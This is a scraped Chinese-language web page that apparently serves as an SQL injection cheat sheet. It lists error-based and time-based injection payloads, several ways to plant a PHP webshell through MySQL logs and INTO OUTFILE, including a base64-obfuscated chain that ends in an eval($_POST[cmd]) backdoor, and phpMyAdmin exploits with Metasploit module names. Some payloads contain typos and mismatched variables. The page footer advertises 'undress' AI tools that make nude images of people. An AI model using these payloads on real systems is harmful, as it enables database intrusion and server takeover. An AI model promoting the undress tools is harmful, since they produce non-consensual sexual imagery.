What are the SQL injection syntaxes?
SQL注入语法
报错注入
updatexml(1,concat(0x7e,(select database()),0x7e),1)--+ extractvalue(1,concat(0x7e,(select database()),0x7e),1)--+ select count(*) from information_schema.tabeles group by concat((select database(),floor(rand(0)*2) select substr(version(),1,1)='X' select substring(version(),1,1)='X'
列名重复报错
select * from (select name_const(version(),1))a; select * from (select name_const((version()),1),name_const((select database()),1))a; select * from (select * from users a join users b)c;
数据溢出报错
select (select(!x-~0) from (select(select user())x)a); select ~0+!(select * from (select user())x);
几何函数报错
multipoint((select * from(select * from(select user())a)b));
case when 语句
select * from datadatabase() case id when 1 else 2 end
时间注入
if right((select database()),a,b)>'s' sleep(5) if assic(substr((select database()),a,b))=98 sleep(5) if assic(substr((select database()) from a to b))=98 sleep(5) if ord(mid((select database()),a,b))=98 sleep(5)
通过日志写shell
利用条件
已知物理路径,目录可写,root权限。
查看配置
show variables like '%general';
开启general log模式
set global general_log=on;
设置日志写shell地址*
set global general_log_file="/var/www/html/log.php";
写入shell
select "<?php phpinfo();>";
通过into outfile写shell
利用条件
已知物理路径,目录可写
select '<?php phpinfo();>' into outfile ‘/var/www/html/1.php'
通过导出表写入shell
use mysql;
create table shell(shell1 text not null);
insert into shell(cmd1) values('<?php phpinfo();>');
select cmd1 from a into outfile '/var/www/html/1.php';mysql from_base64函数利用
利用base64编码来加密,然后使用自定义变量接到,在使用prepare和EXECUTE来执行语句,完成日志写shell的操作。
set
set 用户定义一个变量,变量里面是sql可以执行的语句。
prepare
prepare name from value;
prepare 语句用于预备一个语句,并指定名称name,然后引用改语句。
execute
execute 语句用于执行预备的语句。
联合起来利用
set @sql1 = (select from_base64('c2V0IGdsb2JhbCBnZW5lcmFsX2xvZz1vbg=='));
/*set global general_log=on*/
PREPARE name from @sql;
EXECUTE name;
set @sql2= (select from_base64('c2V0IGdsb2JhbCBnZW5lcmFsX2xvZ19maWxlPSJDOlxcTVlPQVxcd2Vicm$9$vdFxcbG9naW4ucGhwIg=='));
/*set global general_log_file="C:\\MYOA\\webroot\\login.php"*/
PREPARE name from sql2;
EXECUTE name;
select "<?php eval($_POST[cmd]); ?>";
set @sql3 := (select from_base64('c2V0IGdsb2JhbCBnZW5lcmFsX2xvZyA9IG9mZg=='));
/*set global general_log = off*/
PREPARE name from @sql3;
EXECUTE name;phpmyadmin 漏洞合集
phpmyadmin存在pregreplaceeval漏洞
影响版本:3.5.x
phpmyadmin存在serversync.php后门漏洞
影响版本 phpmyadmin v3.5.2.2
msf利用模块 : exploit/multi/http/phpmyadmin3522_backdoor CVE-2012-5159
phpmyadmin 配置文件/config/config.inc.php存在命令执行漏洞
影响版本: 2.11.x
msf利用模块:exploit/unix/webapp/phpmyadmin_config CVE-2009-1151
登录处漏洞
利用方法:用户名处写入'localhost'@'@"
影响版本:2.113/2.114
php爆绝对路径
phpMyAdmin/libraries/selectlang.lib.php
phpMyAdmin/darkblueorange/layout.inc.php
phpMyAdmin/index.php?lang[]=1
phpmyadmin/themes/darkblue_orange/layout.inc.php
The above is the detailed content of What are the SQL injection syntaxes?. For more information, please follow other related articles on the PHP Chinese website!
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
AI Hentai Generator
Generate AI Hentai for free.
Hot Article
Hot Tools
Notepad++7.3.1
Easy-to-use and free code editor
SublimeText3 Chinese version
Chinese version, very easy to use
Zend Studio 13.0.1
Powerful PHP integrated development environment
Dreamweaver CS6
Visual web development tools
SublimeText3 Mac version
God-level code editing software (SublimeText3)
Hot Topics
1359
52
What is the difference between HQL and SQL in Hibernate framework?
Apr 17, 2024 pm 02:57 PM
HQL and SQL are compared in the Hibernate framework: HQL (1. Object-oriented syntax, 2. Database-independent queries, 3. Type safety), while SQL directly operates the database (1. Database-independent standards, 2. Complex executable queries and data manipulation).
Usage of division operation in Oracle SQL
Mar 10, 2024 pm 03:06 PM
"Usage of Division Operation in OracleSQL" In OracleSQL, division operation is one of the common mathematical operations. During data query and processing, division operations can help us calculate the ratio between fields or derive the logical relationship between specific values. This article will introduce the usage of division operation in OracleSQL and provide specific code examples. 1. Two ways of division operations in OracleSQL In OracleSQL, division operations can be performed in two different ways.
Comparison and differences of SQL syntax between Oracle and DB2
Mar 11, 2024 pm 12:09 PM
Oracle and DB2 are two commonly used relational database management systems, each of which has its own unique SQL syntax and characteristics. This article will compare and differ between the SQL syntax of Oracle and DB2, and provide specific code examples. Database connection In Oracle, use the following statement to connect to the database: CONNECTusername/password@database. In DB2, the statement to connect to the database is as follows: CONNECTTOdataba
Detailed explanation of the Set tag function in MyBatis dynamic SQL tags
Feb 26, 2024 pm 07:48 PM
Interpretation of MyBatis dynamic SQL tags: Detailed explanation of Set tag usage MyBatis is an excellent persistence layer framework. It provides a wealth of dynamic SQL tags and can flexibly construct database operation statements. Among them, the Set tag is used to generate the SET clause in the UPDATE statement, which is very commonly used in update operations. This article will explain in detail the usage of the Set tag in MyBatis and demonstrate its functionality through specific code examples. What is Set tag Set tag is used in MyBati
What does the identity attribute in SQL mean?
Feb 19, 2024 am 11:24 AM
What is Identity in SQL? Specific code examples are needed. In SQL, Identity is a special data type used to generate auto-incrementing numbers. It is often used to uniquely identify each row of data in a table. The Identity column is often used in conjunction with the primary key column to ensure that each record has a unique identifier. This article will detail how to use Identity and some practical code examples. The basic way to use Identity is to use Identit when creating a table.
How does Java use the MySQL driver interceptor to implement SQL time-consuming calculations?
May 27, 2023 pm 01:10 PM
Background: One of the company's needs is that the company's existing link tracking log component must support MySQL's SQL execution time printing. The common method to implement link tracking is to implement the interceptor interface or filter interface provided by a third-party framework or tool. MySQL is no exception. In fact, it just implements the interceptor interface driven by MySQL. There are different versions of MySQL channels, and the interceptor interfaces of different versions are different, so you need to implement the response interceptor according to the different versions of MySQL drivers you use. Next, we will introduce MySQL channels 5 and 6 respectively. 8 version implementation. MySQL5 is implemented here using MySQL channel 5.1.18 version as an example to implement Statem
How to solve the 5120 error in SQL
Mar 06, 2024 pm 04:33 PM
Solution: 1. Check whether the logged-in user has sufficient permissions to access or operate the database, and ensure that the user has the correct permissions; 2. Check whether the account of the SQL Server service has permission to access the specified file or folder, and ensure that the account Have sufficient permissions to read and write the file or folder; 3. Check whether the specified database file has been opened or locked by other processes, try to close or release the file, and rerun the query; 4. Try as administrator Run Management Studio as etc.
How to implement Springboot+Mybatis-plus without using SQL statements to add multiple tables
Jun 02, 2023 am 11:07 AM
When Springboot+Mybatis-plus does not use SQL statements to perform multi-table adding operations, the problems I encountered are decomposed by simulating thinking in the test environment: Create a BrandDTO object with parameters to simulate passing parameters to the background. We all know that it is extremely difficult to perform multi-table operations in Mybatis-plus. If you do not use tools such as Mybatis-plus-join, you can only configure the corresponding Mapper.xml file and configure The smelly and long ResultMap, and then write the corresponding sql statement. Although this method seems cumbersome, it is highly flexible and allows us to
